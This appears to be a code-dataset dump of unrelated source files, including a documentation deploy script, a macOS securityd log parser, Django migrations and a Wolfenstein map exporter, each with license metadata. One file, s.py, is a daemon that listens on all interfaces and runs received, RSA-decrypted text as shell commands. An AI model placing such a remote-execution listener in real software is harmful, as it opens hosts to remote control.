os.remove(new_f)
removed.append(new_f)
else:
print("Warning: File %s doesn't exist." % new_f, file=sys.stderr)
files = glob.iglob(join(src, '**'), recursive=True)
# sorted makes this easier to test
for f in sorted(files):
new_f = join(dst, f[len(src):])
if isdir(f):
os.makedirs(new_f, exist_ok=True)
else:
shutil.copy2(f, new_f)
added.append(new_f)
if new_f in removed:
removed.remove(new_f)
with open(log_file, 'w') as f:
f.write('\n'.join(added))
added.append(log_file)
return added, removed
def commit_docs(*, added, removed):
"""
Commit the docs to ``gh-pages`` or a specified deploy branch.
Assumes that :func:`setup_GitHub_push`, which sets up the ``doctr_remote``
remote, has been run and returned True.
Returns True if changes were committed and False if no changes were
committed.
"""
TRAVIS_BUILD_NUMBER = os.environ.get("TRAVIS_BUILD_NUMBER", "<unknown>")
for f in added:
run(['git', 'add', f])
for f in removed:
run(['git', 'rm', f])
# Only commit if there were changes
if subprocess.run(['git', 'diff-index', '--quiet', 'HEAD', '--'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE).returncode != 0:
print("Committing")
run(['git', 'commit', '-am', "Update docs after building Travis build " + TRAVIS_BUILD_NUMBER])
return True
return False
def push_docs(deploy_branch='gh-pages'):
"""
Push the changes to the ``gh-pages`` branch or specified deploy branch.
Assumes that :func:`setup_GitHub_push` has been run and returned True, and
that :func:`commit_docs` has been run. Does not push anything if no changes
were made.
"""
print("Pulling")
run(['git', 'pull'])
print("Pushing commit")
run(['git', 'push', '-q', 'doctr_remote', deploy_branch])
|
mit
| -1,302,443,846,925,126,700
| 33.842407
| 145
| 0.616283
| false
| 3.577523
| false
| false
| false
|
cvandeplas/plaso
|
plaso/parsers/mac_securityd.py
|
1
|
9467
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains the ASL securityd log plaintext parser."""
import datetime
import logging
import pyparsing
from plaso.events import time_events
from plaso.lib import eventdata
from plaso.lib import timelib
from plaso.parsers import manager
from plaso.parsers import text_parser
__author__ = 'Joaquin Moreno Garijo (Joaquin.MorenoGarijo.2013@live.rhul.ac.uk)'
# INFO:
# http://opensource.apple.com/source/Security/Security-55471/sec/securityd/
class MacSecuritydLogEvent(time_events.TimestampEvent):
"""Convenience class for a ASL securityd line event."""
DATA_TYPE = 'mac:asl:securityd:line'
def __init__(
self, timestamp, structure, sender, sender_pid,
security_api, caller, message):
"""Initializes the event object.
Args:
timestamp: The timestamp time value, epoch.
structure: Structure with the parse fields.
level: String with the text representation of the priority level.
facility: String with the ASL facility.
sender: String with the name of the sender.
sender_pid: Process id of the sender.
security_api: Securityd function name.
caller: The caller field, a string containing two hex numbers.
message: String with the ASL message.
"""
super(MacSecuritydLogEvent, self).__init__(
timestamp,
eventdata.EventTimestamp.ADDED_TIME)
self.timestamp = timestamp
self.level = structure.level
self.sender_pid = sender_pid
self.facility = structure.facility
self.sender = sender
self.security_api = security_api
self.caller = caller
self.message = message
class MacSecuritydLogParser(text_parser.PyparsingSingleLineTextParser):
"""Parses the securityd file that contains logs from the security daemon."""
NAME = 'mac_securityd'
DESCRIPTION = u'Parser for Mac OS X securityd log files.'
ENCODING = u'utf-8'
# Default ASL Securityd log.
SECURITYD_LINE = (
text_parser.PyparsingConstants.MONTH.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME.setResultsName('time') +
pyparsing.CharsNotIn(u'[').setResultsName('sender') +
pyparsing.Literal(u'[').suppress() +
text_parser.PyparsingConstants.PID.setResultsName('sender_pid') +
pyparsing.Literal(u']').suppress() +
pyparsing.Literal(u'<').suppress() +
pyparsing.CharsNotIn(u'>').setResultsName('level') +
pyparsing.Literal(u'>').suppress() +
pyparsing.Literal(u'[').suppress() +
pyparsing.CharsNotIn(u'{').setResultsName('facility') +
pyparsing.Literal(u'{').suppress() +
pyparsing.Optional(pyparsing.CharsNotIn(
u'}').setResultsName('security_api')) +
pyparsing.Literal(u'}').suppress() +
pyparsing.Optional(pyparsing.CharsNotIn(u']:').setResultsName('caller')) +
pyparsing.Literal(u']:').suppress() +
pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('message'))
# Repeated line.
REPEATED_LINE = (
text_parser.PyparsingConstants.MONTH.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME.setResultsName('time') +
pyparsing.Literal(u'--- last message repeated').suppress() +
text_parser.PyparsingConstants.INTEGER.setResultsName('times') +
pyparsing.Literal(u'time ---').suppress())
# Define the available log line structures.
LINE_STRUCTURES = [
('logline', SECURITYD_LINE),
('repeated', REPEATED_LINE)]
def __init__(self):
"""Initializes a parser object."""
super(MacSecuritydLogParser, self).__init__()
self._year_use = 0
self._last_month = None
self.previous_structure = None
def VerifyStructure(self, parser_context, line):
"""Verify that this file is a ASL securityd log file.
Args:
parser_context: A parser context object (instance of ParserContext).
line: A single line from the text file.
Returns:
True if this is the correct parser, False otherwise.
"""
try:
line = self.SECURITYD_LINE.parseString(line)
except pyparsing.ParseException:
logging.debug(u'Not a ASL securityd log file')
return False
# Check if the day, month and time is valid taking a random year.
month = timelib.MONTH_DICT.get(line.month.lower())
if not month:
return False
if self._GetTimestamp(line.day, month, 2012, line.time) == 0:
return False
return True
def ParseRecord(self, parser_context, key, structure):
"""Parse each record structure and return an EventObject if applicable.
Args:
parser_context: A parser context object (instance of ParserContext).
key: An identification string indicating the name of the parsed
structure.
structure: A pyparsing.ParseResults object from a line in the
log file.
Returns:
An event object (instance of EventObject) or None.
"""
if key == 'repeated' or key == 'logline':
return self._ParseLogLine(parser_context, structure, key)
else:
logging.warning(
u'Unable to parse record, unknown structure: {0:s}'.format(key))
def _ParseLogLine(self, parser_context, structure, key):
"""Parse a logline and store appropriate attributes.
Args:
parser_context: A parser context object (instance of ParserContext).
key: An identification string indicating the name of the parsed
structure.
structure: A pyparsing.ParseResults object from a line in the
log file.
Returns:
An event object (instance of EventObject) or None.
"""
# TODO: improving this to get a valid year.
if not self._year_use:
self._year_use = parser_context.year
if not self._year_use:
# Get from the creation time of the file.
self._year_use = self._GetYear(
self.file_entry.GetStat(), parser_context.timezone)
# If fail, get from the current time.
if not self._year_use:
self._year_use = timelib.GetCurrentYear()
# Gap detected between years.
month = timelib.MONTH_DICT.get(structure.month.lower())
if not self._last_month:
self._last_month = month
if month < self._last_month:
self._year_use += 1
timestamp = self._GetTimestamp(
structure.day,
month,
self._year_use,
structure.time)
if not timestamp:
logging.debug(u'Invalid timestamp {0:s}'.format(structure.timestamp))
return
self._last_month = month
if key == 'logline':
self.previous_structure = structure
message = structure.message
else:
times = structure.times
structure = self.previous_structure
message = u'Repeated {0:d} times: {1:s}'.format(
times, structure.message)
# It uses CarsNotIn structure which leaves whitespaces
# at the beginning of the sender and the caller.
sender = structure.sender.strip()
caller = structure.caller.strip()
if not caller:
caller = 'unknown'
if not structure.security_api:
security_api = u'unknown'
else:
security_api = structure.security_api
return MacSecuritydLogEvent(
timestamp, structure, sender, structure.sender_pid, security_api,
caller, message)
def _GetTimestamp(self, day, month, year, time):
"""Gets a timestamp from a pyparsing ParseResults timestamp.
This is a timestamp_string as returned by using
text_parser.PyparsingConstants structures:
08, Nov, [20, 36, 37]
Args:
day: An integer representing the day.
month: An integer representing the month.
year: An integer representing the year.
time: A list containing the hours, minutes, seconds.
Returns:
timestamp: A plaso timestamp.
"""
hours, minutes, seconds = time
return timelib.Timestamp.FromTimeParts(
year, month, day, hours, minutes, seconds)
def _GetYear(self, stat, zone):
"""Retrieves the year either from the input file or from the settings."""
time = getattr(stat, 'crtime', 0)
if not time:
time = getattr(stat, 'ctime', 0)
if not time:
current_year = timelib.GetCurrentYear()
logging.error((
u'Unable to determine year of log file.\nDefaulting to: '
u'{0:d}').format(current_year))
return current_year
try:
timestamp = datetime.datetime.fromtimestamp(time, zone)
except ValueError:
current_year = timelib.GetCurrentYear()
logging.error((
u'Unable to determine year of log file.\nDefaulting to: '
u'{0:d}').format(current_year))
return current_year
return timestamp.year
manager.ParsersManager.RegisterParser(MacSecuritydLogParser)
|
apache-2.0
| 7,085,151,202,668,476,000
| 33.300725
| 80
| 0.680046
| false
| 3.961088
| false
| false
| false
|
selboo/starl-mangle
|
Agent/Server/s.py
|
1
|
4397
|
#!/usr/bin/env python
#_*_encoding:utf-8_*_
# encoding:utf-8
import socket, os, subprocess, sys
import time,select,threading
import rsa,base64
import l_command
PRIVATE = os.getcwd()+"/private.pem"
def exchengx_text(text):
Result_Text = []
for i in range(len(text)):
Result_Text.append(''.join(text[i]))
Result_Text = ''.join(Result_Text)
return Result_Text
def key():
return 'Selboo'
def decryption(crypto):
with open(PRIVATE) as privatefile:
p = privatefile.read()
privkey = rsa.PrivateKey.load_pkcs1(p)
try:
message = rsa.decrypt(crypto, privkey)
except rsa.pkcs1.DecryptionError, e:
message = False
print 'ID-002 DecryptionError...:%s' % e
return message
def tcpsocket():
try:
name = 'selboo'
listen_ip = '0.0.0.0'
socket_port = '54321'
buffer_size = '1024'
listen_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_tcp.bind((listen_ip, int(socket_port)))
listen_tcp.setblocking(0)
listen_tcp.listen(100)
except socket.error, e:
print 'ID-001 Create Socket Error...:%s' % e
os._exit(0)
def tcp_send(connection, content):
tcp_limit = 100
tcp_length = len(content)
tcp_subcon = tcp_length / tcp_limit
tcp_tail = tcp_length % tcp_limit
tcp_start = 0
tcp_stop = tcp_limit
tcp_head = str(tcp_length)+','+str(tcp_subcon)+'|'+name
tcp_head = tcp_head.ljust(tcp_limit)
connection.send(tcp_head)
if tcp_length <= tcp_limit:
connection.send(content[tcp_start:tcp_length])
return 0
alist = []
for i in range(0,tcp_subcon):
tcp_d = content[tcp_start:tcp_stop]
connection.send(tcp_d)
time.sleep(0.0001)
tcp_start = tcp_stop
tcp_stop = tcp_stop + tcp_limit
tcp_t = content[tcp_start:tcp_length]
connection.send(tcp_t)
return 0
def command(tag, connection, reault):
if tag == 1:
Reault_exchangx = exchengx_text(reault)
#connection.send(base64.encodestring(Reault_exchangx))
#print Reault_exchangx
tcp_send(connection, Reault_exchangx)
return 0
else:
tcp_send(connection, reault)
return 0
return 1
def tcmd(Test, listen_tcp):
connection,address = listen_tcp.accept()
buf_src = connection.recv(int(buffer_size))
if decryption(buf_src):
buf = decryption(buf_src)
else:
buf_src = 'Decryption failed '+buf_src
connection.send(buf_src)
return 0
if buf == 'l_restart':
reload(l_command)
command(2, connection, str('Restart...'))
return 0
cmd = l_command.l_main(buf)
if cmd:
command(2, connection, str(cmd))
return 0
if len(buf) != 0:
p = subprocess.Popen(str(buf), shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
Result_out = p.stdout.readlines()
if Result_out:
command(1, connection, Result_out)
Result_err = p.stderr.readlines()
if Result_err:
command(1, connection, Result_err)
connection.close()
return 0
while True:
infds,outfds,errfds = select.select([listen_tcp,],[],[],5)
if len(infds) != 0:
ting = threading.Thread(target=tcmd, args=('Test', listen_tcp))
ting.start()
def createDaemon():
try:
if os.fork() > 0:
os._exit(0)
except OSError, error:
print 'fork #1 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
os.chdir('/')
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
#print 'Daemon PID %d' % pid
os._exit(0)
except OSError, error:
print 'fork #2 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
#conn.send(os.getpid())
#conn.close()
funzioneDemo()
def funzioneDemo():
tcpsocket()
if __name__ == '__main__':
createDaemon()
|
apache-2.0
| -6,994,118,043,903,329,000
| 27.006369
| 125
| 0.549011
| false
| 3.526063
| false
| false
| false
|
wiredrive/wtframework
|
generate_examples.py
|
1
|
2872
|
##########################################################################
# This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from __future__ import print_function
import os
from six import u
# This file takes the files in the /tests directory, then converts them
# into strings in wtframework/wtf/_devtools_/filetemplates/examples.py
# These are the files that are generated when the user does --withexamples
# in the project generator
if __name__ == '__main__':
example_path = os.path.join('wtframework', 'wtf', '_devtools_', 'filetemplates', '_examples_.py')
print(example_path)
examples_file = open(example_path,
"w")
examples_file.write(u("""##########################################################################
#This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from six import u
examples = {}
"""))
for root, dirs, files in os.walk('tests'):
for example_file in files:
if not example_file.endswith(".py"):
continue
fpath = os.path.join(root, example_file)
print("processing ", fpath)
the_file = open(fpath)
examples_file.write(u("examples['" + fpath + "'] = u('''"))
examples_file.write(u(the_file.read().replace("'''", '"""')))
examples_file.write(u("\n''')\n\n"))
examples_file.close()
|
gpl-3.0
| -365,536,399,557,576,400
| 38.888889
| 103
| 0.587396
| false
| 4.391437
| false
| false
| false
|
2014c2g5/2014cadp
|
wsgi/local_data/brython_programs/fourbar1.py
|
1
|
1463
|
# need yen_fourbar.js
from javascript import JSConstructor
import math
from browser import doc
import browser.timer
# convert Javascript function object into Brython object
point = JSConstructor(Point)
line = JSConstructor(Line)
link = JSConstructor(Link)
triangle = JSConstructor(Triangle)
def draw():
global theta
# clear canvas context
ctx.clearRect(0, 0, canvas.width, canvas.height)
# draw linkeage
line1.drawMe(ctx)
line2.drawMe(ctx)
line3.drawMe(ctx)
# draw triangles
#triangle1.drawMe(ctx)
#triangle2.drawMe(ctx)
# input link rotation increment
theta += dx
# calculate new p2 position according to new theta angle
p2.x = p1.x + line1.length*math.cos(theta*degree)
p2.y = p1.y - line1.length*math.sin(theta*degree)
temp = triangle2.setPPSS(p2, p4, link3_len, link2_len)
p3.x = temp[0]
p3.y = temp[1]
x, y, r = 10, 10, 10
# define canvas and context
canvas = doc["plotarea"]
ctx = canvas.getContext("2d")
# fourbar linkage inputs
theta = 0
degree = math.pi/180
dx = 2
dy = 4
p1 = point(150, 100)
p2 = point(150, 200)
p3 = point(300, 300)
p4 = point(350, 100)
line1 = link(p1, p2)
line2 = link(p2, p3)
line3 = link(p3, p4)
line4 = link(p1, p4)
line5 = link(p2, p4)
link2_len = p2.distance(p3)
link3_len = p3.distance(p4)
triangle1 = triangle(p1,p2,p4)
triangle2 = triangle(p2,p3,p4)
temp = []
ctx.translate(0, canvas.height)
ctx.scale(1, -1)
browser.timer.set_interval(draw, 10)
|
gpl-3.0
| -3,730,226,384,178,324,500
| 23.813559
| 60
| 0.688312
| false
| 2.719331
| false
| false
| false
|
hydroshare/django_docker_processes
|
migrations/0001_initial.py
|
1
|
9489
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import jsonfield.fields
import django_docker_processes.models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ContainerOverrides',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=256)),
('command', models.TextField(null=True, blank=True)),
('working_dir', models.CharField(max_length=65536, null=True, blank=True)),
('user', models.CharField(max_length=65536, null=True, blank=True)),
('entrypoint', models.CharField(max_length=65536, null=True, blank=True)),
('privileged', models.BooleanField(default=False)),
('lxc_conf', models.CharField(max_length=65536, null=True, blank=True)),
('memory_limit', models.IntegerField(default=0, help_text=b'megabytes')),
('cpu_shares', models.IntegerField(help_text=b'CPU Shares', null=True, blank=True)),
('dns', jsonfield.fields.JSONField(help_text=b'JSON list of alternate DNS servers', null=True, blank=True)),
('net', models.CharField(blank=True, max_length=8, null=True, help_text=b'Network settings - leave blank for default behavior', choices=[(b'bridge', b'bridge'), (b'none', b'none'), (b'host', b'host')])),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerEnvVar',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1024)),
('value', models.TextField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerLink',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('link_name', models.CharField(max_length=256)),
('docker_overrides', models.ForeignKey(blank=True, to='django_docker_processes.ContainerOverrides', help_text=b'Overrides for the container to run', null=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerPort',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerProcess',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('container_id', models.CharField(max_length=128, null=True, blank=True)),
('token', models.CharField(default=django_docker_processes.models.docker_process_token, unique=True, max_length=128, db_index=True)),
('logs', models.TextField(null=True, blank=True)),
('finished', models.BooleanField(default=False)),
('error', models.BooleanField(default=False)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerProfile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=1024, db_index=True)),
('git_repository', models.CharField(max_length=16384)),
('git_use_submodules', models.BooleanField(default=False)),
('git_username', models.CharField(max_length=256, null=True, blank=True)),
('git_password', models.CharField(max_length=64, null=True, blank=True)),
('commit_id', models.CharField(max_length=64, null=True, blank=True)),
('branch', models.CharField(default=b'master', max_length=1024, null=True, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerVolume',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536, null=True, blank=True)),
('container', models.CharField(max_length=65536)),
('readonly', models.BooleanField(default=False)),
('docker_profile', models.ForeignKey(to='django_docker_processes.DockerProfile')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideEnvVar',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1024)),
('value', models.TextField()),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideLink',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('link_name', models.CharField(max_length=256)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
('docker_profile_from', models.ForeignKey(help_text=b'This container must be started and running for the target to run', to='django_docker_processes.DockerProfile')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverridePort',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideVolume',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='dockerprocess',
name='profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerprocess',
name='user',
field=models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True),
preserve_default=True,
),
migrations.AddField(
model_name='dockerport',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerlink',
name='docker_profile',
field=models.ForeignKey(help_text=b'This is the "target" container. It will receive information about\nthe "from" container as an environment var', to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerlink',
name='docker_profile_from',
field=models.ForeignKey(related_name='profile_link_to', to='django_docker_processes.DockerProfile', help_text=b'This container must be started and running for the target to run'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerenvvar',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='containeroverrides',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
]
|
bsd-3-clause
| 3,178,048,872,036,171,000
| 45.743842
| 219
| 0.562125
| false
| 4.520724
| false
| false
| false
|
TexZK/pywolf
|
bin/export_ql_pk3.py
|
1
|
62849
|
# TODO: create Exporter class(es)
# TODO: break export loops into single item calls with wrapping loop
# TODO: allow export to normal file, PK3 being an option (like with open(file_object|path))
import argparse
import collections
import io
import logging
import os
import sys
import zipfile
from PIL import Image
import numpy as np
from pywolf.audio import samples_upsample, wave_write, convert_imf_to_wave, convert_wave_to_ogg
import pywolf.game
from pywolf.graphics import write_targa_bgrx, build_color_image
import pywolf.persistence
from pywolf.utils import find_partition, load_as_module
OBJECT_LIGHT_MAP = { # name: (normalized_height, amount, color)
'ceiling_light': (0.8, 100, (1.0, 1.0, 0.9)),
'chandelier': (0.8, 200, (1.0, 1.0, 0.8)),
'lamp': (0.6, 100, (1.0, 1.0, 0.9)),
'chalice': (0.2, 30, (1.0, 1.0, 0.8)),
'cross': (0.2, 30, (1.0, 1.0, 0.8)),
'crown': (0.2, 30, (1.0, 1.0, 0.8)),
'jewels': (0.2, 30, (1.0, 1.0, 0.8)),
'extra_life': (0.3, 30, (0.8, 0.8, 1.0)),
'gold_key': (0.2, 30, (1.0, 1.0, 0.8)),
'medkit': (0.2, 30, (1.0, 1.0, 1.0)),
'silver_key': (0.2, 30, (0.8, 1.0, 1.0)),
}
COLLECTABLE_ENTITY_MAP = { # (name, wait)
'ammo': ('ammo_pack', 10),
'ammo_used': ('ammo_pack', 10),
'chaingun': ('weapon_chaingun', 5),
'chalice': ('item_armor_shard', 25),
'cross': ('item_armor_shard', 25),
'crown': ('item_armor_shard', 25),
'dog_food': ('item_health_small', 35),
'extra_life': ('item_health_mega', 35),
'food': ('item_health', 35),
'gold_key': ('item_haste', 120),
'jewels': ('item_armor_shard', 25),
'machinegun': ('weapon_hmg', 5),
'medkit': ('item_health_large', 35),
'silver_key': ('item_quad', 120),
}
IMF2WAV_PATH = os.path.join('..', 'tools', 'imf2wav')
OGGENC2_PATH = os.path.join('..', 'tools', 'oggenc2')
TEXTURE_SHADER_TEMPLATE = '''
{0!s}
{{
qer_editorimage {1!s}
noMipMaps
{{
map {1!s}
rgbGen identityLighting
}}
}}
'''
SPRITE_SHADER_TEMPLATE = '''
{0!s}
{{
qer_editorimage {1!s}
noMipMaps
deformVertexes autoSprite2
surfaceparm trans
surfaceparm nonsolid
cull none
{{
clampmap {1!s}
alphaFunc GT0
rgbGen identityLighting
}}
}}
'''
NORTH = 0
EAST = 1
SOUTH = 2
WEST = 3
TOP = 4
BOTTOM = 5
DIR_TO_DISPL = [
( 0, -1, 0),
( 1, 0, 0),
( 0, 1, 0),
(-1, 0, 0),
( 0, 0, 1),
( 0, 0, -1),
]
DIR_TO_YAW = [
90,
0,
270,
180,
0,
0,
]
ENEMY_INDEX_TO_DIR = [
EAST,
NORTH,
WEST,
SOUTH,
]
TURN_TO_YAW = [
0,
45,
90,
135,
180,
225,
270,
315,
]
TURN_TO_DISPL = [
( 1, 0),
( 1, -1),
( 0, -1),
( -1, -1),
( -1, 0),
( -1, 1),
( 0, 1),
( 1, 1),
]
def _force_unlink(*paths):
for path in paths:
try:
os.unlink(path)
except:
pass
def build_cuboid_vertices(extreme_a, extreme_b):
xa, ya, za = extreme_a
xb, yb, zb = extreme_b
return [[(xb, yb, zb), (xa, yb, zb), (xa, yb, za), (xb, yb, za)],
[(xb, ya, zb), (xb, yb, zb), (xb, yb, za), (xb, ya, za)],
[(xa, ya, zb), (xb, ya, zb), (xb, ya, za), (xa, ya, za)],
[(xa, yb, zb), (xa, ya, zb), (xa, ya, za), (xa, yb, za)],
[(xa, yb, zb), (xb, yb, zb), (xb, ya, zb), (xa, ya, zb)],
[(xb, yb, za), (xa, yb, za), (xa, ya, za), (xb, ya, za)]]
def describe_cuboid_brush(face_vertices, face_shaders, shader_scales, format_line=None,
flip_directions=(NORTH, WEST), content_flags=None, surface_flags=None):
if format_line is None:
format_line = ('( {0[0]:.0f} {0[1]:.0f} {0[2]:.0f} ) '
'( {1[0]:.0f} {1[1]:.0f} {1[2]:.0f} ) '
'( {2[0]:.0f} {2[1]:.0f} {2[2]:.0f} ) '
'"{3!s}" 0 0 0 {4:f} {5:f} {6:d} {7:d} 0')
if content_flags is None:
content_flags = (0, 0, 0, 0, 0, 0)
if surface_flags is None:
surface_flags = (0, 0, 0, 0, 0, 0)
lines = ['{']
arrays = zip(range(len(face_vertices)), face_shaders, face_vertices, surface_flags, content_flags)
for direction, shader_name, vertices, surface_flags, content_flags in arrays:
scale_u = shader_scales[0]
scale_v = shader_scales[1]
if direction in flip_directions:
scale_u = -scale_u
line = format_line.format(vertices[0], vertices[1], vertices[2],
shader_name, scale_u, scale_v,
content_flags, surface_flags) # TODO: make as arrays?
lines.append(line)
lines.append('}')
return lines
class MapExporter(object): # TODO
def __init__(self, params, cfg, tilemap, episode_index, submap_index):
self.params = params
self.cfg = cfg
self.tilemap = tilemap
self.episode_index = episode_index
self.submap_index = submap_index
episode = cfg.EPISODES[episode_index]
self.tilemap_index = episode[0] + submap_index
dimensions = tilemap.dimensions
half_units = params.tile_units / 2
self.unit_offsets = ((-half_units * dimensions[0]), (half_units * dimensions[1]), 0)
self.tile_partition_cache = {}
self.entity_partition_cache = {}
def tile_to_unit_coords(self, tile_coords):
tile_units = self.params.tile_units
return [
(tile_coords[0] * tile_units),
(tile_coords[1] * -tile_units),
]
def center_units(self, tile_coords, unit_offsets=(0, 0, 0), center_z=False):
units = self.tile_to_unit_coords(tile_coords)
half = self.params.tile_units / 2
return [(unit_offsets[0] + units[0] + half),
(unit_offsets[1] + units[1] + half),
(unit_offsets[2] + (half if center_z else 0))]
def describe_textured_cube(self, tile_coords, face_shaders, unit_offsets=(0, 0, 0)):
center_x, center_y, center_z = self.center_units(tile_coords, unit_offsets, center_z=True)
half = self.params.tile_units / 2
extreme_a = ((center_x - half), (center_y - half), (center_z - half))
extreme_b = ((center_x + half), (center_y + half), (center_z + half))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
shader_scales = [self.params.shader_scale, self.params.shader_scale]
return describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
def describe_textured_sprite(self, tile_coords, face_shader, unit_offsets=(0, 0, 0)):
center_x, center_y, center_z = self.center_units(tile_coords, unit_offsets, center_z=True)
half = self.params.tile_units / 2
extreme_a = ((center_x - half), (center_y - 1), (center_z - half - 1))
extreme_b = ((center_x + half), (center_y + 0), (center_z + half))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
face_shaders = [
face_shader,
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
]
shader_scales = [self.params.shader_scale, self.params.shader_scale]
return describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
def describe_area_brushes(self, tile_coords): # TODO: support for all floor/ceiling modes of ChaosEdit
params = self.params
cfg = self.cfg
tilemap_index = self.tilemap_index
tile_units = params.tile_units
format_palette_texture = '{}_palette/color_0x{:02x}'.format
lines = []
face_shaders = [
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
format_palette_texture(params.short_name, cfg.CEILING_COLORS[tilemap_index]),
]
offsets = list(self.unit_offsets)
offsets[2] += tile_units
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, offsets))
face_shaders = [
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
format_palette_texture(params.short_name, cfg.FLOOR_COLORS[tilemap_index]),
'common/caulk',
]
offsets = list(self.unit_offsets)
offsets[2] -= tile_units
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, offsets))
return lines
def describe_wall_brush(self, tile_coords):
params = self.params
cfg = self.cfg
tilemap = self.tilemap
x, y = tile_coords
tile = tilemap[x, y]
partition_map = cfg.TILE_PARTITION_MAP
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
face_shaders = []
